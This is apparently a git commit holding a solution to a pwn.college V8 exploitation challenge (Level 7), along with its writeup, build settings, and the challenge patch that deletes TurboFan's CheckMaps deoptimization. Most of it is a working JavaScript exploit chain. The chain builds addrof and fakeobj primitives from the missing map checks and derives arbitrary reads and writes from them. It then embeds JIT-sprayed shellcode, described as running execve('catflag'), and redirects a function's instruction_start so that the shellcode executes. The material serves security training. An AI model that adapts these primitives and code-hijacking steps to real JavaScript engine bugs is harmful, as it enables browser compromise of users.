Level 7 of PwnCollegeV8Exploitation

Jack Ren
2024-09-16 19:18:58 +08:00
parent 05e60b9cef
commit ef1d3be1ca
5 changed files with 262 additions and 0 deletions


@@ -0,0 +1,161 @@
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab, 0, 1);
let i32a = new Uint32Array(ab, 0, 2);
let si32a = new Int32Array(ab, 0, 2);
let bi64a = new BigUint64Array(ab, 0, 1);
function c2f(low, high) { // combine two 32-bit words (low, high) into a float64
i32a[0] = low;
i32a[1] = high;
return f64a[0];
}
function b2f(v) { // bigint to float
bi64a[0] = v;
return f64a[0];
}
function f2b(v) { // float to bigint
f64a[0] = v;
return bi64a[0];
}
function unptr(v) { // clear the HeapObject tag bit -> raw (compressed) address
return v & 0xfffffffe;
}
function ptr(v) { // set the HeapObject tag bit -> tagged pointer
return v | 1;
}
function shellcode() { // Kept hot below so the function and its JIT code are promoted and not GC'd during training
// JIT-sprayed machine code encoding of `execve("catflag", NULL, NULL)`
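// (Assumption, standard float-constant spray technique: each 8-byte double packs a few
// instruction bytes followed by a short jmp into the next constant, so once RIP lands on
// the first constant the chain executes as one contiguous piece of shellcode.)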
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
}
for (let i = 0; i < 1000; i++) shellcode(); // Trigger MAGLEV compilation
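// addrof primitive (rough sketch of the mechanism): `opt` is TurboFan-compiled while `arr`
// is PACKED_DOUBLE_ELEMENTS. Once trigger_flag is set, `transition` switches `arr` to
// PACKED_ELEMENTS, but the patched build never re-checks the map, so `return arr[0]` still
// reads 8 raw bytes from the now-tagged elements store: low 32 bits are the HeapNumber
// boxing 1.1, high 32 bits are the compressed pointer of `obj`.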
function GetAddressOf(obj) {
let trigger_flag;
let arr;
function transition() {
if (trigger_flag)
arr[1] = obj; // Trigger transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS for `arr`
}
// %NeverOptimizeFunction(transition); // Prevents `transition` from being inlined
function opt(arr, i) {
for (let i = 0; i < 1000000; i++); // Burn time so `opt` becomes hot and gets TurboFan-compiled
arr[0] = 1.1;
if (trigger_flag || i < 10) // Keeps `transition` cold, so it is not inlined into `opt`
transition();
return arr[0];
}
trigger_flag = false;
for (let i = 0; i < 1000; i++) {
arr = [1.1, 2.2];
opt(arr, i);
}
// %DebugPrint(opt);
trigger_flag = true;
arr = [1.1, 2.2];
f64a[0] = opt(arr, 0);
return unptr(i32a[1]);
}
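// fakeobj primitive (rough sketch): the same missing-map-check confusion in reverse. After
// the transition `arr` is PACKED_ELEMENTS, yet the JITed `arr[0] = c2f(ptr(addr), 0)` still
// stores a raw 8-byte double, planting `addr | 1` as a tagged pointer in element 0; reading
// `arr[0]` afterwards from unoptimized code then yields a "JSObject" located at `addr`.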
function GetFakeObject(addr) {
let trigger_flag;
let arr;
function transition() {
if (trigger_flag)
arr[1] = {}; // Trigger transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS for `arr`
}
// %NeverOptimizeFunction(transition); // Prevents `transition` from being inlined
function opt(arr, i) {
for (let i = 0; i < 1000000; i++); // Burn time so `opt` becomes hot and gets TurboFan-compiled
arr[0] = 1.1;
if (trigger_flag || i < 10) // Keeps `transition` cold, so it is not inlined into `opt`
transition();
arr[0] = c2f(ptr(addr), 0);
}
trigger_flag = false;
for (let i = 0; i < 1000; i++) {
arr = [1.1, 2.2];
opt(arr, i);
}
// %DebugPrint(opt);
trigger_flag = true;
arr = [1.1, 2.2];
opt(arr, 0);
return arr[0];
}
// let x = {};
// %DebugPrint(x);
// console.log(GetAddressOf(x).toString(16));
// %DebugPrint(GetFakeObject(0xffff0000));
// Create a PACKED_DOUBLE_ELEMENTS array whose elements encode a faked PACKED_DOUBLE_ELEMENTS JSArray
// map, properties, elements, length --- the first three fields are static roots
var arr = [c2f(0x001cb7f9, 0x00000725), c2f(0x00000725, 0x00008000)];
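// The two doubles pack the four 32-bit fields of the fake JSArray:
//   c2f(0x001cb7f9, 0x00000725): map (PACKED_DOUBLE_ELEMENTS map), properties
//   c2f(0x00000725, 0x00008000): elements, length (Smi 0x4000 = 16384)
// (Assumption: 0x725 is presumably the empty FixedArray static root; all constants are
// build-specific and read off %DebugPrint output.)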
// %DebugPrint(arr);
// %SystemBreak();
var arr_addr = GetAddressOf(arr);
console.log("Address of arr: " + arr_addr.toString(16));
var fakearr = GetFakeObject(arr_addr + 0x54); // Heap Fengshui
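// (Assumption: 0x54 is the offset, found via %DebugPrint / %SystemBreak under GDB, at which
// the first crafted double sits inside arr's elements store, so the fake JSArray's map
// field lands exactly on c2f(0x001cb7f9, 0x00000725).)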
// %DebugPrint(fakearr);
// %SystemBreak();
// cage_addr must be QWORD-aligned
function ArbRead64(cage_addr) { // int32 -> bigint
if (cage_addr & 0x7) throw new Error("Must be QWORD aligned");
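// Repoint the fake array's elements at cage_addr - 8: element 0 then starts right after the
// 8-byte FixedDoubleArray header (map + length), i.e. exactly at cage_addr.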
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let result = f2b(fakearr[0]);
console.log(`ArbRead64 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// cage_addr must be QWORD-aligned
function ArbWrite64(cage_addr, value) { // int32, bigint
if (cage_addr & 0x7) throw new Error("Must be QWORD aligned");
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let written = b2f(value);
fakearr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
// cage_addr must be DWORD-aligned
function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must be DWORD aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// cage_addr must be DWORD-aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must be DWORD aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
let shellcode_addr = GetAddressOf(shellcode);
console.log("Address of shellcode: " + shellcode_addr.toString(16));
// %DebugPrint(shellcode);
// %SystemBreak();
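// Hijack control flow: read the Code object out of the `shellcode` JSFunction, then bump its
// instruction_start so the next call lands inside the JIT-sprayed float constants.
// (Assumption: 0xC is the JSFunction code-field offset, 0x14 the instruction_start offset
// inside the Code object, and 0x6B the distance from the original entry point to the first
// sprayed constant; all three are build-specific values recovered with %DebugPrint / GDB.)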
let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
console.log("Address of code: " + code_addr.toString(16));
let instruction_start_addr = code_addr + 0x14;
let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode();


@@ -0,0 +1,18 @@
# Level 7
## Problem
The patch deletes every `Deoptimize` call emitted for `CheckMaps` in the Machine Lowering phase of Turboshaft, which means TurboFan-generated JIT code no longer bails out when an object's map is wrong.
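A minimal sketch of the resulting type confusion, modelled on the exploit's `GetAddressOf` (hypothetical `victim`/`corrupt` names; assumes the patched `d8` and that `victim` reaches TurboFan):
```js
let arr;
let evil = false;

function corrupt() {
  // Once enabled, transitions arr from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS.
  if (evil) arr[1] = {};
}

function victim(a, i) {
  a[0] = 1.1;                    // store specialized on the double-elements map
  if (evil || i < 10) corrupt(); // called rarely during warm-up, keeping corrupt() cold
  return a[0];                   // with the CheckMaps deopt gone, still read as a raw 8-byte double
}

for (let i = 0; i < 10000; i++) { arr = [1.1, 2.2]; victim(arr, i); } // get victim() TurboFan-compiled

evil = true;
arr = [1.1, 2.2];
// On the patched build this prints tagged heap pointers reinterpreted as a float instead of
// 1.1 (a stock build would deoptimize); this confusion is the basis of the exploit's
// addrof/fakeobj primitives.
console.log(victim(arr, 0));
```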
## Key Knowledge
- What does the Machine Lowering phase in Turboshaft do?
> [MachineLoweringReducer, formerly known as EffectControlLinearizer, lowers simplified operations to machine operations.](https://source.chromium.org/chromium/v8/v8.git/+/5a2307d0f2c5b650c6858e2b9b57b335a59946ff:src/compiler/turboshaft/machine-lowering-reducer-inl.h;l=43)
- [V8 Turbolizer](https://github.com/v8/v8/tree/main/tools/turbolizer) for debugging
- Turbolizer is an HTML-based tool that visualizes optimized code along the various phases of Turbofan's optimization pipeline, allowing easy navigation between source code, Turbofan IR graphs, scheduled IR nodes and generated assembly code.
- [Online V8 Turbolizer](https://v8.github.io/tools/head/turbolizer/index.html)
- [V8 Native Syntax List](https://source.chromium.org/chromium/v8/v8.git/+/5a2307d0f2c5b650c6858e2b9b57b335a59946ff:src/runtime/runtime.h;l=494)
- How to ensure a function is neither inlined nor optimized? (see the sketch after this list)
- Native Syntax: `%NeverOptimizeFunction(func);`
- No Native Syntax: keep the function cold; call it only a handful of times during warm-up (cf. the `trigger_flag || i < 10` guard in the exploit).
- Patience and perseverance: keep trying after every failure!
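A small sketch of both options (hypothetical `helper`/`hot` names; native syntax requires running `d8` with `--allow-natives-syntax`, and `--trace-turbo` dumps the `turbo-*.json` files that Turbolizer loads):
```js
// Run with: ./d8 --allow-natives-syntax --trace-turbo poc.js

function helper(arr, x) { arr[1] = x; }

// Option 1, native syntax: tell the optimizer to never optimize (and thus never inline) helper.
%NeverOptimizeFunction(helper);

// Option 2, no native syntax: keep helper cold by calling it only a few times during
// warm-up (cf. the `trigger_flag || i < 10` guard in the exploit), so the optimizing
// caller never sees it as worth inlining.
function hot(arr, i) {
  arr[0] = 1.1;
  if (i < 10) helper(arr, 2.2);
  return arr[0];
}

for (let i = 0; i < 100000; i++) hot([1.1, 2.2], i);
```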


@@ -0,0 +1 @@
5a2307d0f2c5b650c6858e2b9b57b335a59946ff


@@ -0,0 +1,10 @@
is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false


@@ -0,0 +1,72 @@
diff --git a/src/compiler/turboshaft/machine-lowering-reducer-inl.h b/src/compiler/turboshaft/machine-lowering-reducer-inl.h
index 170db78717b..17b0fe5c4e9 100644
--- a/src/compiler/turboshaft/machine-lowering-reducer-inl.h
+++ b/src/compiler/turboshaft/machine-lowering-reducer-inl.h
@@ -2740,7 +2740,7 @@ class MachineLoweringReducer : public Next {
const ZoneRefSet<Map>& maps, CheckMapsFlags flags,
const FeedbackSource& feedback) {
if (maps.is_empty()) {
- __ Deoptimize(frame_state, DeoptimizeReason::kWrongMap, feedback);
+ //__ Deoptimize(frame_state, DeoptimizeReason::kWrongMap, feedback);
return {};
}
@@ -2749,14 +2749,14 @@ class MachineLoweringReducer : public Next {
IF_NOT (LIKELY(CompareMapAgainstMultipleMaps(heap_object_map, maps))) {
// Reloading the map slightly reduces register pressure, and we are on a
// slow path here anyway.
- MigrateInstanceOrDeopt(heap_object, __ LoadMapField(heap_object),
- frame_state, feedback);
- __ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
- DeoptimizeReason::kWrongMap, feedback);
+ //MigrateInstanceOrDeopt(heap_object, __ LoadMapField(heap_object),
+ // frame_state, feedback);
+ //__ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
+ // DeoptimizeReason::kWrongMap, feedback);
}
} else {
- __ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
- DeoptimizeReason::kWrongMap, feedback);
+ //__ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
+ // DeoptimizeReason::kWrongMap, feedback);
}
// Inserting a AssumeMap so that subsequent optimizations know the map of
// this object.
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
+/* global_template->Set(Symbol::GetToStringTag(isolate),
String::NewFromUtf8Literal(isolate, "global"));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
global_template->Set(isolate, "readline",
FunctionTemplate::New(isolate, ReadLine));
global_template->Set(isolate, "load",
- FunctionTemplate::New(isolate, ExecuteFile));
+ FunctionTemplate::New(isolate, ExecuteFile));*/
global_template->Set(isolate, "setTimeout",
FunctionTemplate::New(isolate, SetTimeout));
// Some Emscripten-generated code tries to call 'quit', which in turn would
// call C's exit(). This would lead to memory leaks, because there is no way
// we can terminate cleanly then, so we need a way to hide 'quit'.
- if (!options.omit_quit) {
+/* if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
if (i::v8_flags.expose_async_hooks) {
global_template->Set(isolate, "async_hooks",
Shell::CreateAsyncHookTemplate(isolate));
- }
+ }*/
return global_template;
}